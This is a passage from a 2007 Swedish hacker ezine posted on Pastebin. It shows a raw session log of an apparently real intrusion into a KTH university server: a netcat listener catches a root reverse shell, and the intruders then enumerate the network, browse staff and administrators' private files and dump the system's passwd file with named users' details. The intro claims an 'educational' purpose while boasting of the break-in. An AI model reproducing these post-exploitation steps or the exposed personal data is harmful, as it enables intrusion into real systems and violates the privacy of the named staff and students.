Guest User

kebabCrew

a guest
Oct 28th, 2007
3,326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 98.06 KB | None | 0 0
  1.  
  2. kebabzine_0x01.txt
  3.  
  4.  
  5. I denna utg�va kommer vi ber�tta f�ljande h�ndelser:
  6.  
  7. 001 - Inledning
  8. 002 - Att hacka it.KTH.se
  9. 003 - Att hacka forsmark.uu.se
  10. 004 - Att hacka ki.se
  11. 005 - Tacograt�ng v2
  12.  
  13.  
  14. #######
  15. # 001 #
  16. #######
  17.  
  18. F�r dig som inte vet vad ett ezine �r kan jag f�rklara det enkelt. Det �r ett Elektroniskt Magasin, allts� bara text fast ett magasin! h�ftigt va :]
  19.  
  20. Historialektion!
  21.  
  22. p� irkken h�nger folk som inte g�r annat �n att r�ka sin nyrullade jolle och skriver ondk0d f�r att sedan spridas vidare,
  23. de har allts� inget liv eller vanligt arbete att g� till p� dagarna.
  24.  
  25. Kebab Crew har absolut inte gjort n�got olagligt som det kommer att skrivas om h�r utan skrivs helt
  26. i utbildningssyfte, det du g�r med informationen f�r du st� f�r sj�lv. Dess grundare/�gare har Absolut INGET med N�GOT olagligt
  27. h�r i att g�ra!
  28.  
  29. Vi tar allts� inget ansvar f�r vad som skrivs i detta Elektroniska Magazine.
  30.  
  31. D� var det avklarat.. Det kan bli lite kladdigt, vi fick korta ner endel d� loggarna l�g p� alldeles f�r m�nga MB f�r att ha med allt h�r..
  32. n�v�l.. ACTION PLEASE!!!
  33.  
  34. #######
  35. # 002 #
  36. #######
  37.  
  38. sh-2.05b# nc -l -p 443 -vv
  39. listening on [any] 443 ...
  40. connect to [70.84.105.194] from fluff.it.kth.se [130.237.203.50] 37364
  41. sh -i
  42. # id
  43. uid=0(root) gid=0(root)
  44. # arp -a
  45. Net to Media Table: IPv4
  46. Device IP Address Mask Flags Phys Addr
  47. ------ -------------------- --------------- ----- ---------------
  48. bge0 hydrogen.it.kth.se 255.255.255.255 00:01:02:74:3b:81
  49. bge0 130.237.203.33 255.255.255.255 00:04:de:64:37:e9
  50. bge0 sodium.it.kth.se 255.255.255.255 00:04:76:90:2b:51
  51. bge0 gulltop.kth.se 255.255.255.255 00:11:85:66:ca:b5
  52. bge0 silicon.it.kth.se 255.255.255.255 00:b0:d0:ee:8f:d3
  53. bge0 nafs.it.kth.se 255.255.255.255 00:03:ba:16:7b:73
  54. bge0 burkskinka.it.kth.se 255.255.255.255 00:03:ba:3f:14:b3
  55. bge0 tonks.it.kth.se 255.255.255.255 00:03:ba:67:45:15
  56. bge0 beryllium.it.kth.se 255.255.255.255 00:60:08:f6:e6:fd
  57. bge0 neon.it.kth.se 255.255.255.255 00:04:76:90:32:1a
  58. bge0 magnesium.it.kth.se 255.255.255.255 00:50:da:8f:f7:50
  59. bge0 fluff.it.kth.se 255.255.255.255 SP 00:03:ba:67:47:59
  60. bge0 www.imit.kth.se 255.255.255.255 SP 00:03:ba:67:47:59
  61. bge0 puff.it.kth.se 255.255.255.255 00:03:ba:05:ed:26
  62. bge0 streamweb.it.kth.se 255.255.255.255 00:b0:d0:e7:af:b7
  63. bge0 streammedia.it.kth.se 255.255.255.255 00:b0:d0:fa:16:d3
  64. bge0 mornaia.it.kth.se 255.255.255.255 00:0c:f1:fc:fb:f1
  65. bge0 130.237.203.2 255.255.255.255 00:04:de:64:37:e9
  66. bge0 phosphorus.it.kth.se 255.255.255.255 00:11:11:cd:09:43
  67. bge0 info.ean.it.kth.se 255.255.255.255 00:04:76:90:32:1a
  68. bge0 BASE-ADDRESS.MCAST.NET 240.0.0.0 SM 01:00:5e:00:00:00
  69. # ping mail.kth.se
  70. mail.kth.se is alive
  71. # w
  72. 6:10pm up 85 day(s), 3:20, 0 users, load average: 0.30, 0.23, 0.20
  73. # mount
  74. / on /dev/md/dsk/d30 read/write/setuid/intr/largefiles/logging/xattr/onerror=panic/dev=154001e on Sat Jun 17 14:50:32 2006
  75. /proc on /proc read/write/setuid/dev=4b40000 on Sat Jun 17 14:50:31 2006
  76. /etc/mnttab on mnttab read/write/setuid/dev=4c00000 on Sat Jun 17 14:50:31 2006
  77. /dev/fd on fd read/write/setuid/dev=4c40000 on Sat Jun 17 14:50:32 2006
  78. /var on /dev/md/dsk/d32 read/write/setuid/intr/largefiles/logging/xattr/onerror=panic/dev=1540020 on Sat Jun 17 14:50:33 2006
  79. /var/run on swap read/write/setuid/xattr/dev=1 on Sat Jun 17 14:50:33 2006
  80. /tmp on swap read/write/setuid/xattr/dev=2 on Sat Jun 17 14:50:33 2006
  81. /afs on AFS read/write/setuid/dev=1234 on Sat Jun 17 14:50:43 2006
  82. # uname -a
  83. SunOS fluff 5.9 Generic_117171-07 sun4u sparc SUNW,Sun-Fire-V210
  84. # pwd
  85. /home/glenn
  86. # head getme.txt
  87. /usr/sfw/bin/wget http://139.237.203.50/~glenn/9_Recommended.zip
  88. # head tankarecommended.txt
  89. wget ftp://sunsolve.sun.com/pub/patches/9_Recommended.zip
  90. # pwd
  91. /afs/it.kth.se/home/staff/glenn/public_html
  92. # ls
  93. #foo#
  94. 2005 Semesterlista.xls
  95. 8gen.jpg
  96. CellServDB
  97. Dscn0070.jpg
  98. Dscn0164.jpg
  99. EN500.jpg
  100. EPC1.ZIP
  101. EPC2.ZIP
  102. GTFourST205.jpg
  103. GTFourST205_t.jpg
  104. Ice.Age.CD1.DVDRip.SVCD-ABEZ.mpg <<-- WAREZ @ IT . KTH .SE !!
  105. Jag_har_en_sjalvlysande_klocka.mp3
  106. Kaktus_Mahoney-Jobba.mp3
  107. Linus_Walleij_-_Warez_the_Phuture.mp3
  108. Myrslok.jpg
  109. NinjaGT2.jpg
  110. SUNWspci_13.tar
  111. SUNWspci_13.tar.Z
  112. Sallskapsresan-Tjena_Berra.mp3
  113. Superbikewholered.jpg
  114. afsetc
  115. anneli.jpg
  116. any_html_browser.gif
  117. arlstrdd16.jpg
  118. athena.tar.gz
  119. avatarHQ.jpg
  120. avatarst205_100x61.jpg
  121. bash
  122. bil
  123. bunnypancake.jpg
  124. busty_mousepad.jpg
  125. c1.jpg
  126. celica.jpg
  127. celica.tif
  128. celicamod
  129. classesstuff.lha
  130. conf.tar
  131. cv_glenn.txt
  132. danneh
  133. dcs
  134. dorrsida.jpg
  135. em.jpg
  136. em2.jpg
  137. em3.jpg
  138. faj
  139. faxmall.doc
  140. fil.txt
  141. fil.txt.~1~
  142. fil1.txt
  143. fil2.txt
  144. film1.mov
  145. film5.mov
  146. filur.jpg
  147. find_ddos
  148. fittipaldi.jpg
  149. flash.image
  150. flop.jpg
  151. fly
  152. foo
  153. fsck
  154. glenn4.jpg
  155. gsx1100.jpg
  156. gsx1100e.jpg
  157. helmethalf.jpg
  158. hjemmedata.jpg
  159. host
  160. index.html
  161. index.html.~17~
  162. index.html.~18~
  163. index.html.~1~
  164. inetboot.SUN4U.Solaris_8-1
  165. inetd.conf
  166. instrument
  167. ipaq.html
  168. ipaq.html.~1~
  169. ipaq.html.~2~
  170. itu.png
  171. itusmall.png
  172. jessica
  173. junk
  174. junsupra_full.mpg
  175. krb.conf
  176. krb.realms
  177. krb5.conf
  178. ld.config
  179. lego
  180. lista.txt
  181. ls
  182. m1.jpg
  183. mailjox
  184. mc
  185. merca.txt
  186. mercan3.jpg
  187. moduler.tgz
  188. ncftp
  189. partimage
  190. persconf.tar
  191. pics
  192. porridge.html
  193. ps
  194. puff.flash
  195. putty.sis
  196. rd500.jpg
  197. resolv.conf
  198. s1.jpg
  199. saab9000.jpg
  200. savage_drv.o
  201. shaved_kitten.jpg
  202. smallturbo.jpg
  203. solaris8.image
  204. sshCE1.exe
  205. st205-.jpg
  206. st205-2.jpg
  207. st205_ok.jpg
  208. st205_svetsat.jpg
  209. stry-forbjudna_ljud-live_vagen03.mp3
  210. subba
  211. tank
  212. tcs
  213. tools.html
  214. tools.html.~1~
  215. tools.html.~7~
  216. tools.html.~8~
  217. top
  218. top.html.~1~
  219. top.html.~3~
  220. top.html.~4~
  221. turbo
  222. turboavatar-mini.jpg
  223. turboavatar.jpg
  224. tutt
  225. utdelning
  226. wget
  227. who
  228. wifi
  229. wolf_kill_rabbit.jpg
  230. ws.html
  231. xtbakifran.jpg
  232. xtsmall.jpg
  233. yappa-ng
  234. yastralp.lha
  235. zatzy.jpg
  236.  
  237. -----
  238.  
  239. # ls
  240. alfvenlab.kth.se
  241. cell
  242. e.kth.se
  243. foreign_cells
  244. hallf.kth.se
  245. isk.kth.se
  246. it.kth.se
  247. md.kth.se
  248. mech.kth.se
  249. nada.kth.se
  250. pdc.kth.se
  251. stacken.kth.se
  252. su.se
  253. telge.kth.se
  254. transarc.com
  255. adm.su.se
  256. akpa.su.se
  257. anchem.su.se
  258. antiken.su.se
  259. ark.su.se
  260. arthistory.su.se
  261. astro.su.se
  262. bbalt.su.se
  263. bergianska.se
  264. big.su.se
  265. biling.su.se
  266. botan.su.se
  267. cceifo.su.se
  268. cellbio.su.se
  269. chess.su.se
  270. crim.su.se
  271. ddbb.su.se
  272. demo
  273. dsv.su.se
  274. eeko.su.se
  275. ekohist.su.se
  276. eks.su.se
  277. english.su.se
  278. etnologi.su.se
  279. ffek.su.se
  280. film.su.se
  281. finska.su.se
  282. folkliv.su.se
  283. fos.su.se
  284. fraita.su.se
  285. ggenetics.su.se
  286. geo.su.se
  287. gi-ihr.su.se
  288. hhistoria.su.se
  289. holding.su.se
  290. hors.nu
  291. humangeo.su.se
  292. iideagenten.su.se
  293. iies.su.se
  294. info.su.se
  295. internat.su.se
  296. interped.su.se
  297. isp.su.se
  298. it.su.se
  299. itm.su.se
  300. jjmk.su.se
  301. juridicum.su.se
  302. kklassiska.su.se
  303. ks.se
  304. kvinfo.su.se
  305. llai.su.se
  306. larostudion.su.se
  307. ling.su.se
  308. littvet.su.se
  309. mmain.kol.su.se
  310. matematik.su.se
  311. mibi.su.se
  312. miljokemi.su.se
  313. misu.su.se
  314. molbio.su.se
  315. msi.se
  316. nnatgeo.su.se
  317. ne.su.se
  318. neurochem.su.se
  319. nordiska.su.se
  320. nrm.se
  321. oorgan.su.se
  322. orient.su.se
  323. ppb.su.se
  324. ped.su.se
  325. people.su.se
  326. philosophy.su.se
  327. physto.se
  328. planering.su.se
  329. pog.su.se
  330. popgen.su.se
  331. pous.su.se
  332. psychology.su.se
  333. pu.su.se
  334. qrradfys.ks.se
  335. ssamfak.su.se
  336. sb.su.se
  337. scfab.se
  338. score.su.se
  339. sieps.su.se
  340. slav.su.se
  341. smf.su.se
  342. socant.su.se
  343. socarb.su.se
  344. sociology.su.se
  345. sofi.su.se
  346. ssif.su.se
  347. stat.su.se
  348. statsvet.su.se
  349. student.su.se
  350. sub.su.se
  351. success.su.se
  352. system.ecology.su.se
  353. ttb.su.se
  354. teater.su.se
  355. tolk.su.se
  356. tyska.su.se
  357. uvwwgi.su.se
  358. xyzzoologi.su.se
  359.  
  360. --------
  361.  
  362. # cd welander
  363. # ls
  364. Alla mina dokument 3
  365. Budget 06
  366. Desktop
  367. Maildir
  368. OldFiles
  369. Thunderbird
  370. Uppf inst halvåret 2005 Aktuell nu.xls
  371. documents
  372. office52
  373. public
  374. public_html
  375. windows_home
  376. # cd Alla*
  377. # ls
  378. Anställningar
  379. Beräkningar
  380. Bra länkar.doc
  381. Budget
  382. Budget_verktyg
  383. DIVERSE
  384. Data från Raindance
  385. Dator-tips
  386. Delbeslut
  387. Desktop.ini
  388. ERIKA
  389. Ekonomiavd
  390. Ekonominätverk
  391. Externa_medel
  392. FN_AU_SB
  393. Felix2.exe
  394. Försök medlokalmedel.xls
  395. INFO personal
  396. Kansliet
  397. L-listor
  398. Möte linne med rektor.doc
  399. OH till Stefan uppf dec 2005
  400. PM FN Skevik.doc
  401. Personalbyrån
  402. Presentationer
  403. Regler-Beslut
  404. Snabb info ekonomi.xls
  405. Tider ekonom.xls
  406. Torsdag budgetarbete
  407. UTBETALN
  408. Universitetets ekonominätverk inbjudan2-2.doc
  409. Uppföljning
  410. Utredningar
  411. Verksamhetsuppföljn
  412. roligt
  413. semester sida 1.xls
  414. �
  415. renden
  416. # cd ERIKA
  417. l# s
  418. Fråm_Lena_i_Lund
  419. Gammalt
  420. Min Senaste version.xls
  421. Ny mapp
  422. Sthlm april 2005
  423. �verskrid representation.doc
  424. # cd ..
  425. l# s
  426. Anställningar
  427. Beräkningar
  428. Bra länkar.doc
  429. Budget
  430. Budget_verktyg
  431. DIVERSE
  432. Data från Raindance
  433. Dator-tips
  434. Delbeslut
  435. Desktop.ini
  436. ERIKA
  437. Ekonomiavd
  438. Ekonominätverk
  439. Externa_medel
  440. FN_AU_SB
  441. Felix2.exe
  442. Försök medlokalmedel.xls
  443. INFO personal
  444. Kansliet
  445. L-listor
  446. Möte linne med rektor.doc
  447. OH till Stefan uppf dec 2005
  448. PM FN Skevik.doc
  449. Personalbyrån
  450. Presentationer
  451. Regler-Beslut
  452. Snabb info ekonomi.xls
  453. Tider ekonom.xls
  454. Torsdag budgetarbete
  455. UTBETALN
  456. Universitetets ekonominätverk inbjudan2-2.doc
  457. Uppföljning
  458. Utredningar
  459. Verksamhetsuppföljn
  460. roligt
  461. semester sida 1.xls
  462. �
  463. renden
  464.  
  465. # pwd
  466. /afs/su.se/home/adm.su.se/w/e/welander/Alla mina dokument 3
  467.  
  468.  
  469. # cat krb5.conf
  470. [libdefaults]
  471. default_realm = IT.KTH.SE
  472. v4_instance_resolve = yes
  473. #krb4_get_tickets = yes
  474. default_etypes = des-cbc-crc
  475. default_etypes_des = des-cbc-crc
  476.  
  477. [realms]
  478. IT.KTH.SE = {
  479. kdc = kerberos.it.kth.se
  480. kdc = kerberos-1.it.kth.se
  481. kdc = kerberos-2.it.kth.se
  482. kpasswd_server = kerberos.it.kth.se
  483. admin_server = kerberos.it.kth.se
  484. v4_name_convert = {
  485. host = {
  486. pop = pop
  487. rcmd = host
  488. ftp = host
  489. }
  490. }
  491. v4_instance_convert = {
  492. kerberos = kerberos
  493. }
  494. v4_domains = it.kth.se imit.kth.se
  495. }
  496. [domain_realm]
  497. .it.kth.se = IT.KTH.SE
  498. .imit.kth.se = IT.KTH.SE
  499.  
  500. [kdc]
  501.  
  502. # cat /etc/shado     /passwd
  503. root:x:0:1:Super-User:/:/sbin/sh
  504. daemon:x:1:1::/:
  505. bin:x:2:2::/usr/bin:
  506. sys:x:3:3::/:
  507. adm:x:4:4:Admin:/var/adm:
  508. smmsp:x:25:25:Sendmail:/var/spool/clientmqueue:
  509. lp:x:71:8:Line Printer Admin:/usr/spool/lp:
  510. uucp:x:5:5:uucp Admin:/usr/lib/uucp:
  511. nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
  512. listen:x:37:4:Network Admin:/usr/net/nls:
  513. nobody:x:60001:60001:Nobody:/:
  514. noaccess:x:60002:60002:No Access User:/:
  515. nobody4:x:65534:65534:SunOS 4.x Nobody:/:
  516. sshd:x:109:109:SSH User:/:
  517. glenn:x:647:10:Glenn Bjorken,staff,,,,20000921,elu/henriks,20020921:/home/glenn:/usr/bin/bash
  518. postgres:x:223:1::/usr/local/postgres:/bin/sh
  519. jihe:x:35013:10:Jim Heikkinen:/home/jihe:/usr/bin/bash
  520. enrico:x:30883:4101:Enrico Pelletta,tslab,,,,19990528,jj/bjorn,20000528:/afs/it.kth.se/home/tslab/enrico:/usr/bin/bash
  521. fli:x:52467:4000:Fredrik Lilieblad,teleinf,,,,20010226,elu/bjorn,20040226:/afs/it.kth.se/home/staff/fli:/usr/bin/bash
  522. nagios:x:60003:60003:nagios:/opt/KTHict/nagios/:/bin/sh
  523. jj:x:603:60001:Janne Johansson,staff,,,,951124,flag/flag,981124:/afs/it.kth.se/home/staff/jj:/bin/false
  524. mn:x:604:60001:Mattias Nordstr|m,staff,,,,960110,rom/rom,990110:/afs/it.kth.se/home/staff/mn:/bin/false
  525. Hans:x:610:60001:Hans Berggren root,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/hans:/bin/false
  526. HANS:x:611:60001:Hans Berggren admin,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/hans:/bin/false
  527. tko:x:612:60001:Tomi Kortelainen,staff,,,,960502,flag/staff,990502:/afs/it.kth.se/home/staff/tko:/bin/false
  528. meriksson:x:618:60001:Mikael Eriksson,staff,,,,970131,tomi/staff,20000131:/afs/it.kth.se/home/staff/mier:/bin/false
  529. Richard:x:628:60001:Richard Andersson root,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/richard:/bin/false
  530. RICHARD:x:629:60001:Richard Andersson admin,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/richard:/bin/false
  531. julio:x:633:60001:Julio Mercado,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/julio:/bin/false
  532. Julio:x:634:60001:Julio Mercado root,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/julio:/bin/false
  533. JULIO:x:635:60001:Julio Mercado admin,staff,,,,20010406,elu/elu,20060406:/afs/it.kth.se/home/staff/julio:/bin/false
  534. iocc:x:636:60001:Peter Magnusson,staff,,,,20011203,hans/hans,20061203:/afs/it.kth.se/home/staff/iocc:/bin/false
  535. Iocc:x:637:60001:Peter Magnusson root,staff,,,,20011203,hans/hans,20061203:/afs/it.kth.se/home/staff/iocc:/bin/false
  536. IOCC:x:638:60001:Peter Magnusson admin,staff,,,,20011203,hans/hans,20061203:/afs/it.kth.se/home/staff/iocc:/bin/false
  537. wombat:x:640:60001:Norman Smith,staff,,,,19991206,mzi/holmis,20041206:/afs/it.kth.se/home/staff/wombat:/bin/false
  538. elu:x:646:60001:Erik Lundesj�,staff,,,,20000504,wombat/holmis,20010504:/afs/it.kth.se/home/staff/elu:/bin/false
  539. Glenn:x:648:60001:Glenn Bjorcken root,staff,,,,20000921,elu/henriks,20010921,,u1hgjqz6:/afs/it.kth.se/home/staff/glenn:/bin/false
  540. GLENN:x:649:60001:Glenn Bjorcken admin,staff,,,,20000921,elu/henriks,20010921,,u1hgjqz6:/afs/it.kth.se/home/staff/glenn:/bin/false
  541. pl:x:650:60001:Per Lindgren,staff,,,,20000922,elu/bjorn,20010922:/afs/it.kth.se/home/staff/pl:/bin/false
  542. sparcos:x:667:60001:Sparcos Sunetti,staff,,,,950627,rom/staff,980627:/afs/it.kth.se/home/staff/sparcos:/bin/false
  543. unison:x:668:60001:Netscape Calendar Daemon User,staff,,,,970623,tomi/staff,990627:/users/unison:/bin/false
  544. abuse:x:669:60001:abuse - spam reporting address:/afs/it.kth.se/home/staff/sparcos:/bin/false
  545. ict:x:699:60001:ICT user for pts groups:/:/bin/false
  546. mikan:x:904:60001:Mikael Andersson,guest,,,,970122,jj/rassul,20000122:/afs/it.kth.se/home/guest/mikan:/bin/false
  547. max:x:912:60001:Max Zomborszki,guest,,,,19991209,mzi/mzi,20041209:/afs/it.kth.se/home/guest/max:/bin/false
  548. lha:x:913:60001:Love H�rnquist-�strand,guest,,,,19990304,mzi/mzi,20000304:/afs/it.kth.se/home/guest/lha:/bin/false
  549. jimmy:x:916:60001:Jimmy Engelbrecht,guest,,,,20000926,elu/elu,20050926:/afs/it.kth.se/home/guest/jimmy:/bin/false
  550. assar:x:1094:60001:Assar Westerlund,D90,,81 76 02,,931102,cwe/rom,,:/afs/it.kth.se/home/guest/assar:/bin/false
  551. lisper:x:1179:60001:Bjorn Lisper,TDS,7864,075830799,,,/le,20010101:/afs/it.kth.se/home/ds/lisper:/bin/false
  552. evaf:x:1213:60001:Eva Frykevall,f84,,,,941223,flag/rassul,971223:/afs/it.kth.se/home/f84/evaf:/bin/false
  553. liman:x:1221:60001:Lars-Johan Liman,TDS,,,Sysop TDS,911119,uffe/flag,990101:/afs/it.kth.se/home/guest/liman:/bin/false
  554. md87-kdi:x:1304:60001:Karl Dickson,md87,,,,951103,rom/tyugu,961103:/afs/it.kth.se/home/md87/md87-kdi:/bin/false
  555. md93-jho:x:1310:60001:Jonas Holmerin,md93,,,,950101,jj/lisper,991010:/afs/it.kth.se/home/md93/md93-jho:/bin/false
  556. nv91-fgh:x:1677:60001:Firouz Ghoreshi,nv91,,,,951005,flag/rassul,981005:/afs/it.kth.se/home/nv91/nv91-fgh:/bin/false
  557. nv91-agu:x:1743:60001:Anders Gustavsson,nv91,,,,970514,mier/bjorn,980514:/afs/it.kth.se/home/nv91/nv91-agu:/bin/false
  558. nv91-lny:x:1784:60001:Lena Nyl�n,nv91,,,,960223,flag/lisper,990223:/afs/it.kth.se/home/nv91/nv91-lny:/bin/false
  559. md93-mma:x:1798:60001:Mafo Magoye,md93,,,,970128,jj/rassul,20000128:/afs/it.kth.se/home/md93/md93-mma:/bin/false
  560. nv91-iou:x:1803:60001:Ibrahim Oussi,nv91,,,,960311,jj/bjorn,990311:/afs/it.kth.se/home/nv91/nv91-iou:/bin/false
  561. md93-pmo:x:1930:60001:Patrick Morsing,md93,,,,960131,flag/joachim,990131:/afs/it.kth.se/home/md93/md93-pmo:/bin/false
  562. cwe:x:2045:60001:Christian Wettergren,TSlab,1491,,,,/maguire:/afs/it.kth.se/home/staff/cwe:/bin/false
  563. nv91-tob:x:2082:60001:Tobias �brink,nv91,,,,960201,flag/bjorn,990201:/afs/it.kth.se/home/nv91/nv91-tob:/bin/false
  564. d92-ssa:x:2255:60001:Samy Sancho,d92,,,,950207,rom/bergdahl,980207:/afs/it.kth.se/home/d92/d92-ssa:/bin/false
  565. stefanl:x:2536:60001:Stefan Larsson,tx96,,,,961120,jj/bergdahl,991120:/afs/it.kth.se/home/tx96/stefanl:/bin/false
  566. nv92-rrk:x:3580:60001:Ramin-Kabiri Rad Monfared,nv92,,,,970311,tomi/bjorn,20000311:/afs/it.kth.se/home/nv92/nv92-rrk:/bin/false
  567. d92-dne:x:3584:60001:Daniel Neri,d92,,,,960311,jj/bjorn,990311:/afs/it.kth.se/home/d92/d92-dne:/bin/false
  568. d92-tor:x:3659:60001:Tobias �rfors,d92,,,,960311,jj/bjorn,990311:/afs/it.kth.se/home/d92/d92-tor:/bin/false
  569. d92-rbo:x:3706:60001:Renee Boregerd,d92,,,,950207,rom/bergdahl,980207:/afs/it.kth.se/home/d92/d92-rbo:/bin/false
  570. d92-mbr:x:3708:60001:Mikael Brejcha,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-mbr:/bin/false
  571. d92-fch:x:3711:60001:Fredrik Christiansson,d92,,,,941208,flag/bergdahl,971208:/afs/it.kth.se/home/d92/d92-fch:/bin/false
  572. d92-sci:x:3712:60001:Sevald Cirkov,d92,,,,960109,flag/tyugu,990109:/afs/it.kth.se/home/d92/d92-sci:/bin/false
  573. d92-kdj:x:3715:60001:Kaveh Djavaherian,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-kdj:/bin/false
  574. d92-mer:x:3722:60001:Martin Eriksson,d92,,,,980309,jj/lisper,990309:/afs/it.kth.se/home/d92/d92-mer:/bin/false
  575. d92-jfo:x:3727:60001:Johan Forsberg,d92,,,,960311,jj/bjorn,990311:/afs/it.kth.se/home/d92/d92-jfo:/bin/false
  576. d92-aho:x:3743:60001:Andreas H�gstr�m,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-aho:/bin/false
  577. d92-dle:x:3759:60001:Daniel Lefwerth,d92,,,,980317,jj/lisper,990317:/afs/it.kth.se/home/d92/d92-dle:/bin/false
  578. d92-olo:x:3767:60001:Ola L�nnqvist,d92,,,,960109,flag/tyugu,990109:/afs/it.kth.se/home/d92/d92-olo:/bin/false
  579. d92-tma:x:3768:60001:Tommy Malmstr�m,d92,,,,960109,flag/tyugu,990109:/afs/it.kth.se/home/d92/d92-tma:/bin/false
  580. d92-mma:x:3770:60001:Marten Mattson,d92,,,,950207,rom/bergdahl,980207:/afs/it.kth.se/home/d92/d92-mma:/bin/false
  581. d92-pni:x:3774:60001:Patrik Nilsson,d92,,,,960311,jj/bjorn,990311:/afs/it.kth.se/home/d92/d92-pni:/bin/false
  582. d92-ano:x:3778:60001:Ali Nowbakht,d92,,,,980118,jj/tyugu,990118:/afs/it.kth.se/home/d92/d92-ano:/bin/false
  583. d92-sod:x:3779:60001:Stefan Odelfalk,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-sod:/bin/false
  584. d92-jor:x:3782:60001:Jonas Oreland,d92,,,,960109,flag/tyugu,990109:/afs/it.kth.se/home/d92/d92-jor:/bin/false
  585. d92-lpe:x:3785:60001:Lars Persson,d92,,,,950216,flag/bergdahl,980216:/afs/it.kth.se/home/d92/d92-lpe:/bin/false
  586. d92-mra:x:3786:60001:Mahmoud Rahmani,d92,,,,960311,flag/bjorn,990311:/afs/it.kth.se/home/d92/d92-mra:/bin/false
  587. d92-rre:x:3789:60001:Roberto Rezza,d92,,,,941208,flag/bergdahl,971208:/afs/it.kth.se/home/d92/d92-rre:/bin/false
  588. d92-jri:x:3790:60001:Jan Ringius,d92,,,,970307,jj/rassul,20000307:/afs/it.kth.se/home/d92/d92-jri:/bin/false
  589. d92-pro:x:3791:60001:Philip Roos,d92,,,,980118,jj/tyugu,990118:/afs/it.kth.se/home/d92/d92-pro:/bin/false
  590. d92-jsa:x:3793:60001:Johan Samuelsson,d92,,,,941208,flag/bergdahl,971208:/afs/it.kth.se/home/d92/d92-jsa:/bin/false
  591. d92-msa:x:3794:60001:Magnus Sandberg,d92,,,,960223,flag/lisper,990223:/afs/it.kth.se/home/d92/d92-msa:/bin/false
  592. d92-hse:x:3801:60001:Hossen Setambar,d92,,,,20000328,wombat/mfd,20010328:/afs/it.kth.se/home/d92/d92-hse:/bin/false
  593. d92-ssj:x:3803:60001:Staffan Sj�lund,d92,,,,970307,jj/rassul,20000307:/afs/it.kth.se/home/d92/d92-ssj:/bin/false
  594. d92-asu:x:3808:60001:Andreas Suurkuusk,d92,,,,960122,flag/tyugu,990122:/afs/it.kth.se/home/d92/d92-asu:/bin/false
  595. d92-jth:x:3813:60001:Joakim Thor�n,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-jth:/bin/false
  596. d92-cti:x:3814:60001:Christine Timgren,d92,,,,19990422,jj/lisper,20000422:/afs/it.kth.se/home/d92/d92-cti:/bin/false
  597. d92-uak:x:3822:60001:Ulf �kerstedt,d92,,,,19990422,jj/lisper,20000422:/afs/it.kth.se/home/d92/d92-uak:/bin/false
  598. d92-aas:x:3823:60001:Anders �sbrink,d92,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/d92/d92-aas:/bin/false
  599. johan:x:4010:60001:Johan Wennlund,TDS,,,,911017,uffe/le,20010101:/afs/it.kth.se/home/ds/johan:/bin/false
  600. ritaf:x:4016:60001:Rita Fjellendahl,IT,Tekniker,,,,/henriks:/afs/it.kth.se/home/admin/ritaf:/bin/false
  601. gunnarj:x:4022:60001:Gunnar Johansson,Admin,1368,,,,/le,20010101:/afs/it.kth.se/home/admin/gunnarj:/bin/false
  602. rassul:x:4025:60001:Rassul Ayani,TDS,255 7864,,,,/le,19990917:/afs/it.kth.se/home/ds/rassul:/bin/false
  603. janos:x:4028:60001:Janos Werner,TDS,,,,,/henriks:/afs/it.kth.se/home/guest/janos:/bin/false
  604. f:x:4030:60001:F Lundevall,cslab,,,,/le,20010101:/afs/it.kth.se/home/ds/f:/bin/false
  605. bjorn:x:4037:60001:Bj�rn Pehrson,TSLAB,,,,890920,larsh/bjorn,20010101,,u10vyfl1:/afs/it.kth.se/home/tslab/bjorn:/bin/false
  606. robertr:x:4038:60001:Robert Ronngren,TDS,,,,87062l,/rassul:/afs/it.kth.se/home/ds/robertr:/bin/false
  607. kff:x:4050:60001:Karl-Filip Faxen,TDS,,,,880229,bernhard/le,:/afs/it.kth.se/home/ds/kff:/bin/false
  608. hjorth:x:4080:60001:P�r-Olof Hjorth, PPS assistent:/afs/it.kth.se/home/guest/hjorth:/bin/false
  609. yuliu:x:4087:60001:Yuejin Liu,Docent,,,,931102,maguire:/afs/it.kth.se/home/tslab/yuliu:/bin/false
  610. tyugu:x:4096:60001:Enn Tyugu, Professor/TDS,,,,920107,luis/le,20010101:/afs/it.kth.se/home/ds/tyugu:/bin/false
  611. os_adb:x:4509:60001:OS Automatic Administrator, EF207,,,,,/rassul:/afs/it.kth.se/home/courses/os_adb:/bin/false
  612. jakoblun:x:4541:60001:Jakob Lundberg,STUD,,,,040121,hans/matsbror,050121,,u19vgse9:/afs/it.kth.se/home/9/jakoblun:/bin/false
  613. jness:x:4543:60001:Johan Nessaether,STUD,,,,040121,hans/matsbror,050121,,u1c6c3ef:/afs/it.kth.se/home/f/jness:/bin/false
  614. jimmysv:x:4548:60001:Jimmy Svensson,STUD,,,,040121,hans/matsbror,050121,,u1bwy5b9:/afs/it.kth.se/home/9/jimmysv:/bin/false
  615. erikake:x:4553:60001:Erik �kerfeldt,STUD,,,,040121,hans/matsbror,050121,,u1vjv8o2:/afs/it.kth.se/home/2/erikake:/bin/false
  616. absmai:x:4655:60001:Abdel-Halim Smai,CSIM group,,,,911119,uffe/le,950601:/afs/it.kth.se/home/ds/absmai:/bin/false
  617. kempe:x:6698:60001:Andreas K�mpe,IMIT,,,,050310,iocc/iocc,070310,,u18dkrpf:/afs/it.kth.se/home/f/kempe:/bin/false
  618. joachim:x:7124:60001:Joachim Parrow,DS,1525,018-303063,,,/bjorn:/afs/it.kth.se/home/sics/joachim:/bin/false
  619. maguire:x:7186:60001:Gerald Maguire,Professor TSlab,,,,/bjorn,20010101:/afs/it.kth.se/home/tslab/maguire:/bin/false
